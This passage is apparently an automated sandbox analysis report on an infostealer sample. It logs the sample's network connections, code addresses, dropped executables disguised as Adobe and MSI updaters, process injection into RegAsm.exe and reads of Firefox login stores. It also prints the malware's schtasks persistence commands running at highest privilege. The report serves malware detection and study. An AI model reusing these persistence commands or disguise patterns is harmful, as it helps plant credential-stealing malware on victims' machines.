                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49765 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49766 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49767 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.189.66:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0042DDE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0042DDE0

                  System Summary

                  barindex
                  .NET source code contains very large array initializations
                  Source: lumma1504[1].exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: AdobeUpdaterV202.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  Source: MSIUpdaterV202.exe.0.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 307200
                  PE file contains section with special chars
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C9A8BD0_2_00C9A8BD
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CBB0100_2_00CBB010
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CBA7900_2_00CBA790
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC0_2_00FDC8DC
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D00_2_00FDC0D0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D5C0A00_2_00D5C0A0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C8A0400_2_00C8A040
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CAF0500_2_00CAF050
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C971F00_2_00C971F0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC1BF0_2_00FDC1BF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD99D0_2_00FDD99D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDBA910_2_00FDBA91
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C91A300_2_00C91A30
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C9ABFF0_2_00C9ABFF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CA83140_2_00CA8314
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE4CA40_2_00FE4CA4
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D5F4500_2_00D5F450
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CB34500_2_00CB3450
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE45A20_2_00FE45A2
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE3D890_2_00FE3D89
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C80DB00_2_00C80DB0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE056D0_2_00FE056D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE3D1D0_2_00FE3D1D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDCEA00_2_00FDCEA0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00CACEA10_2_00CACEA1
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDB75B0_2_00FDB75B
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeCode function: 6_2_01160A316_2_01160A31
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004251837_2_00425183
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004216707_2_00421670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415B577_2_00415B57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404C407_2_00404C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00421F807_2_00421F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004100607_2_00410060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004010007_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D1287_2_0041D128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B1307_2_0043B130
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004082507_2_00408250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004042607_2_00404260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004033707_2_00403370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B4707_2_0043B470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004364807_2_00436480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004066107_2_00406610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004216CE7_2_004216CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004017407_2_00401740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004037707_2_00403770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004058907_2_00405890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00406C207_2_00406C20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DD727_2_0041DD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426E677_2_00426E67
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426F297_2_00426F29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426FA07_2_00426FA0
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeCode function: 8_2_00C60A318_2_00C60A31
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeCode function: 9_2_00D10A319_2_00D10A31
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0072970011_2_00729700
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeCode function: 14_2_02A60A3114_2_02A60A31
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeCode function: 16_2_01590A3116_2_01590A31
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408C90 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004092E0 appears 160 times
                  Source: 2q45IEa3Ee.exeStatic PE information: invalid certificate
                  Source: 2q45IEa3Ee.exeStatic PE information: Resource name: SETUPSERVICE_WIN7 type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: 2q45IEa3Ee.exeStatic PE information: Resource name: SETUPSERVICE_WIN8 type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilename vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000006002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQuestion.exeJ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1876269087.00000000056E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1876269087.00000000056E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000000.1620206673.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilenameSetupAfterRebootService.exeP vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeBinary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs 2q45IEa3Ee.exe
                  Source: 2q45IEa3Ee.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: lumma1504[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: AdobeUpdaterV202.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: MSIUpdaterV202.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: ZLIB complexity 0.9998214068579766
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: ZLIB complexity 0.9965173192771084
                  Source: 2q45IEa3Ee.exeStatic PE information: Section: .reloc ZLIB complexity 1.5
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/30@3/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042A936 CoCreateInstance,7_2_0042A936
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1ENDJump to behavior
                  Source: 2q45IEa3Ee.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000003.1627633755.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1627633755.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1811612230.0000000005FA8000.00000004.00000020.00020000.00000000.sdmp, hFeN_nRcyMkILogin Data.0.dr, LBC6lg2YJ3HXLogin Data For Account.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 2q45IEa3Ee.exeVirustotal: Detection: 23%
                  Source: 2q45IEa3Ee.exeReversingLabs: Detection: 28%
                  Source: 2q45IEa3Ee.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile read: C:\Users\user\Desktop\2q45IEa3Ee.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\2q45IEa3Ee.exe "C:\Users\user\Desktop\2q45IEa3Ee.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe"
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHESTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHESTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSection loaded: mswsock.dllJump to behavior
